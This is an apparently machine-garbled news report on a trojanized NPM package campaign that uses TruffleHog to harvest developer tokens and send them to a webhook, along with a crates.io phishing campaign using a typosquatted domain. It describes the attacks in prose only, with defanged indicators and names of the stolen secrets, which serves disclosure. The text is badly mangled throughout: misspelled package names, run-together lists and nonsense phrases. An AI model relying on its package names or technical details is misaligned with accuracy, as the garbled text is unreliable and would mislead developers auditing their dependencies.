Cybersecurity researchers have flagged fresh software supply chain attacks targeting NPM registry that affected more than 40 packages belonging to multiple maintainers.
“The compromised version includes a function (npmmodule.updatePackage) that downloads the package’s talball, changes the package, injects local scripts (bundle.js), reissue the archive, reissue, and enable automatic trojunization of downstream packages.”
The ultimate goal of the campaign is to use Trufflehog’s certification scanner to search for developer machines and send them to an external server under the control of an attacker. This attack can target both Windows and Linux systems.
The following packages have been identified as being affected by an incident –
Angulartics2@14.1.2@ctrl/deluge@7.2.2@ctrl/golang-template@1.4.3@ctrl/magnet-link@4.0.4@ctrl/ngx-codemirror@7.0.2@ctrl/ngx-csv@6.0.2@ctrl/ngx-emoji-mart@9.2.2 @ctrl/ngx-rightclick @4.0.2 @ctrl/qbittorrent @9.7.2 @ctrl/race-adsense @2.0.2 @ctrl/shared-torrent @6.3.2 @ctrl/tinycolor @4.1.1, @4.1.2 @ctrl/torrent-file @4.1.2 @ctrl/ @ctrl/ts-base32@4.0.2 Encounter-playground@0.0.5 json-rules-engine-simplified@0.2.4, 0.2.1 Koa2-swagger-ui@5.11.2, 5.11.1@nativescript-community/gesturehandler@2.0.35@nativescript-community/sentry 4.6.43 @nativescript-community/text @1.6.13 @nativescript-community/ui-collectionView @6.0.6 @nativescript-community/ui-drawer @0.1.30 @nativescript-community/ui-image @4.5.6 @nativescript-community/ui-material bottomsheet @7.2.72 @nativescript-community/ui-material-core@7.2.76@nativescript-community/ui-material-core-tabs@7.2.76 ngx-color@10.0.2 ngx-toart@19.0.2 ngx-trend@8.0.1 racece-compraint-image React-Jsonschema-form-extras@1.0.4 rxnt-authentication@0.0.6 rxnt-healthchecks-nestjs@1.0.5 rxnt-kue@1.0.7 swc-plugin-component-annotate@1.9.2 ts-gauss@3.0.6
The malicious JavaScript code injected into each of the Trojanized Packages (“Bundle.js”) is designed to download and run Trufflehog, a legitimate secret scan tool. Use this to scan hosts for tokens and cloud entitlements such as Github_token, NPM_TOKEN, AWS_KEY_ID, AWS_SERET_KEY, etc.
“It validates the NPM token on the hoami endpoint and interacts with the Github API when the token is available,” says Socket. “We will also attempt to discover cloud metadata that can leak short-lived credentials within the cloud build agent.”
This script then abuses the developer’s credentials (i.e. GitHub Personal Access Token) to create a Github action workflow in .github/workflow and removes the collected data into the webhook.[.]Site endpoint.
Developers are advised to audit the environment and rotate NPM tokens and other exposed secrets if the packages mentioned above are publicly entitled.
“The workflows written in the repository last beyond the original host,” the company says. “Once committed, future CI runs can trigger peeling steps from within a pipeline where sensitive secrets and artifacts are available in the design.”
crates.io phishing campaign
Disclosure is made because Rust Security Response Working Group is a phishing email warning from the Typosquatted domain, Rustfoundation.[.]dev, targeting crates.io users.
Message from Security@Rustfoundation[.]Dev warns recipients of suspected compromise in the crates.io infrastructure, and instructs them to rotate their login information by clicking on the embedded link and “make sure the attacker can’t change the package you’re publishing.”
Rogue Link, github.rustfoundation[.]The developer mimics the github login page, indicating a clear attempt by the attacker to obtain the victim’s credentials. The phishing page is currently unaccessible.
“These emails come from domain names that are malicious and not controlled by the Rust Foundation (Rust Project). “There is no evidence of a compromise in the crates.io infrastructure.”
The Rust team also said in addition to removing the phishing domain, it is taking steps to monitor suspicious activity at Crates.io.
Source link
